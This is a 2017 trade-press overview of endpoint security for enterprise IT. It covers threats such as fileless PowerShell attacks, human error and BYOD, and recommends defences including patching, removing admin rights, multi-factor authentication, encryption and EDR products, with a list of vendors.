ENDPOINT DETECTION AND RESPONSE (EDR)

Wednesday Mar 15th 2017 by Sue Poremba
Share:

Endpoint security provides a layer of protection for devices outside the firewall.

Endpoints may be the weakest link in network security. IT departments are tasked with ensuring the security of dozens of devices - desktops, laptops, mobile devices and now the Internet of Things (IoT) - that connect to the network. Here is a comprehensive look at endpoint security, its challenges, and what can be done to better protect the endpoints while improving overall IT security.

What is endpoint security?

Endpoint security means different things to different people, so we'll begin with a definition useful for enterprise IT departments. An endpoint is defined as any device connecting to the network from outside the firewall or perimeter. The rise in endpoints is largely due to the increasing numbers of employees who work offsite and need to access the network, as well as the different devices being used and the rise of the Internet of Things (IoT).

Endpoint security is the process of providing protection to those devices with the ultimate aim of protecting the network and an organization's data. Endpoint security is a critical part of an organization's overall security posture because devices that are outside a well-protected, internal network create pathways for attackers to bypass standard controls, says Rob Arnold, founder of Threat Sketch, which provides cyber security risk assessments for small and medium businesses. Even the best firewalls and controls are rendered useless when the internal network is extended to a point that goes beyond traditional perimeter security systems.

Examples of common endpoints in the workplace include:

·       Desktop and laptop computers

·       Smartphones

·       Tablets

·       Routers and WiFi

·       Point-of-sale devices

·       IoT devices

Endpoint security challenges

There are two problems that effective endpoint protection attempts to solve, according to Naveen Palavalli, director of product and solutions marketing at Symantec. They are emerging and advanced threats and disjointed endpoint security solutions that require separate agents.

Emerging and advanced threats

There are some very serious threats facing networks. Data breaches and ransomware, for example, are two of the biggest concerns for any organization. Exploit kits are another major infection vector wreaking havoc on enterprises. Symantec's research shows that on average, there are more than one million new malware variants created by attackers each day, and much of this malware uses a number of both new and known techniques to infiltrate the endpoint using email, browser, applications and devices as the entry point.

Palavalli said these emerging and advanced threats use both file-based as well as file-less techniques such as in-memory attacks and PowerShell scripts. Attackers are targeting PowerShell scripts, used for task automation and configuration management and installed by default on most Windows computers, because most organizations don't have extended logging enabled. That makes malicious scripts largely invisible. Symantec found that 95 percent of PowerShell scripts were found to be malicious.

More formidable malware continues to be developed, zero-day attacks continue to accelerate, and ransomware continues to expand to new connected devices. These threats are designed to target enterprises through a wide variety attack vectors. This makes endpoints even more vulnerable, and in turn, finding endpoint security solutions isn't a luxury; it's a necessity.

Disjointed endpoint security solutions

IT and security personnel are tasked with managing and maintaining multiple endpoint agents that often have fragmented security systems. These disjointed endpoint security solutions don’t always mesh cleanly with the rest of IT security infrastructure. Complicating the issue is the shortage of security professionals, and those who are handling security for the company may not be trained to deal with multiple security products or the challenges that endpoint security present. Many of these solutions require a great amount of fine-tuning to make them work for the specific needs of that customer.

That's why more organizations should consider endpoint monitoring solutions that analyze connectivity activities and can identify anomalies that point to potential threats.

Endpoint security's greatest challenge: People

There is one endpoint security challenge that is almost impossible to monitor with software solutions or data protection controls. That's human behavior. We live in a world that moves at a fast pace and where corporate leadership expects high productivity. That means employees are multi-tasking, sometimes using two or three devices at once. They are often too distracted or in a hurry and don't think before they click on an email link or accept an update request. With one simple stroke, a single endpoint device has put the entire network at risk.

One problem is that employees aren't security savvy. It may be that the organization doesn't offer regular security awareness training opportunities or send out security-related bulletins. Employees can't practice good security if they aren't educated in what best practices are, or if they aren't informed of what the latest phishing threat looks like. How to defend against these insider threats involves a combination of better awareness and endpoint security software.

Another issue is too many people think that security is someone else's problem, so they don't feel the need to use security tools. This is especially a problem in organizations that have instituted Bring Your Own Device (BYOD). Without policies about the types of devices allowed, security personnel aren't able to track what is accessing the network and whether or not those endpoints have security software installed. So the challenge for IT departments is to ensure every connected device is protected and getting software updates.

There are tools available to address the human problem of endpoint security. BYOD network access control (NAC) is described by Frost & Sullivan as "a self-contained solution capable of policy creation/management, authentication, endpoint assessment, enforcement, and remediation," and is an effective method to manage the myriad of devices using the network.

Behavior analytics is a newer endpoint security solution. According to Gartner's User and Entity Behavior (UEBA) Trends Report, behavior analytics monitors areas such as user behavior as well as the behaviors of the network and other entities connecting to it, and looks for patterns and activities that are out of the norm.

Protecting the endpoint from potential threats

The first and probably most important piece of solving endpoint security is determining exactly what endpoints you actually have, according to Richard Henderson, global security strategist at Absolute, a Canadian endpoint security and data risk management company. Many organizations struggle to gain a comprehensive state of full visibility. Without full visibility, it's impossible to have security. You can't determine the security controls, security effectiveness and vulnerability posture of endpoints you can't see or manage.

Once you solve the visibility issue, the next step is to mitigate or minimize the vast majority of risks seen in networks now. That's why it's important to have a program in place for endpoint monitoring for the following areas:

·       Vulnerability management

·       Vulnerability patching

·       Sensitive data discovery, which should include data loss prevention (DLP) as well as identification of exfiltration of sensitive or potentially-sensitive data through cloud storage or web-based applications

It takes time to develop a good security posture and endpoint security is no exception. It can't be done all at once or cover everything instantly. Critical needs and critical users must receive the most immediate attention, with additional protections and controls based on different criteria such as leadership levels, amount of network privileges and access, or BYOD/mobile connectivity. It's a matter of recognizing who or which devices are most likely to be targeted and would create the most damage from an attack.

Endpoint protection steps

RJ Gazarek, product manager at Thycotic, suggested the following simple steps to protect the network from endpoint threats:

·       Remove/manage administrative accounts on endpoints: Regular users do not need administrative rights to do their every day jobs. For those applications that require administrative rights, the organization can implement an application control solution that can provide administrative rights to those approved programs that require it. Removing administrative access on the endpoint can mitigate much of the damage that an attacker can cause if they are able to compromise that endpoint.

·       Keep systems patched and up to date: Vulnerabilities are discovered all the time, and malicious attackers are keeping a close watch as these vulnerabilities are discovered. If the vulnerability is particularly dangerous, attackers will start sweeping across businesses attempting to find organizations that didn't patch the vulnerability in order to gain access.  Your policy and procedure must enforce keeping systems on the network up to date.

·       Implement advanced authentication: Some of the breaches that occurred in 2016 were secondary breaches due to a previous breach. Usually this happens when someone uses the same password across multiple sites and devices. If an employee's account was compromised in a data breach and they use the same password to login to their system, then it's easy to access that system. If the organization implements advanced authentication, the attacker won't have access to complete authentication abilities, even if the password is stolen.

·       Security awareness and training: Continued awareness and training on password, security, and electronic use best practices can go a long way. Unfortunately, an organization cannot rely solely on training, because again, humans make mistakes – and they can easily be the weakest link in a strong security program.

Endpoint encryption and access controls

Endpoint encryption is a critical layer of endpoint security. Encryption protects the data on the devices themselves and during transmission, keeping outside actors from being able to copy or otherwise transfer that information. Full disk encryption is even more effective, as it encrypts the entire hard drive, protecting not just the data but the operating system and applications too. In this case, the encryption key is required at the boot up stage, and once applied, the system will decrypt enough to run normally.

Another data protection control is application controls, which prevent unauthorized users from executing applications on the endpoint device. Not only does this protect the endpoint from outsiders taking over applications, but it can control what authorized users of the device can download or access. It also protects the network from potential data threats from departing employees with the ability to lock them from enterprise applications.

A VPN is another critical endpoint protection tool that organizations should be using.

Endpoint security vendors and products

Many endpoint products are "one trick" solutions, said Palavalli, relying on one specific technology. The most reliable endpoint security solutions are expansive, using a mix of machine learning, exploit prevention, threat intelligence, behavioral analytics, multi-layered protection, endpoint detection and response, and integration with other security tools. Four things to consider when looking for an endpoint security vendor or specific product:

Is this the best prevention solution for your needs? If you deal with credit card transactions, does the solution cover point of sale security, for example? Is it a multi-layered protection that defends the endpoint from every attack vector, whether that is email, web browser, applications or devices like a USB stick? Will it prevent lateral movement and communication to command and control servers?

We know that breaches are inevitable and there will be regular attacks against your endpoints, no matter how large or small your organization is. Your endpoint security solution should allow you to quickly identify any breach and aid in expedited investigation and response.

Other considerations:

·       Does the endpoint security software offer robust tools for remediating every artifact of malware?

·       Does the endpoint security solution integrate with the rest of the security infrastructure such as network security, IT ticketing systems and SIEMS?

Endpoint security is less a matter of specific products than it is a deliberate deployment of existing capabilities and policies.

The experts interviewed for this article said the following solutions could help protect enterprise networks from endpoint security risks:

·       AlienVault, a multi-point solution provider

·       Bitdefender, which works with a variety of endpoints and platforms and is good at catching false positives

·       Symantec Endpoint Protection 14 offers complete endpoint security with a single agent and integrates with Symantec Advanced Threat Protection Endpoint, the company's endpoint detection and response tool for incident investigation.

Other vendors offering comprehensive endpoint protection solutions:

·       Trend Micro

·       Kaspersky

·       Sophos

·       Intel Security (formerly McAfee)

·       Check Point

·       SentinelOne

·       CrowdStrike

·       Cylance

·       Invincea

·       Carbon Black

·       Palo Alto Networks

·       F-Secure

Top EDR vendors

The most advanced form of endpoint security is endpoint detection and response (EDR), which offers continuous monitoring and response to advanced security threats. For our in-depth reviews of EDR products, see Top 10 Endpoint Detection and Response (EDR) Solutions.

Share:
Home
Mobile Site | Full Site
Copyright 2017 © QuinStreet Inc. All Rights Reserved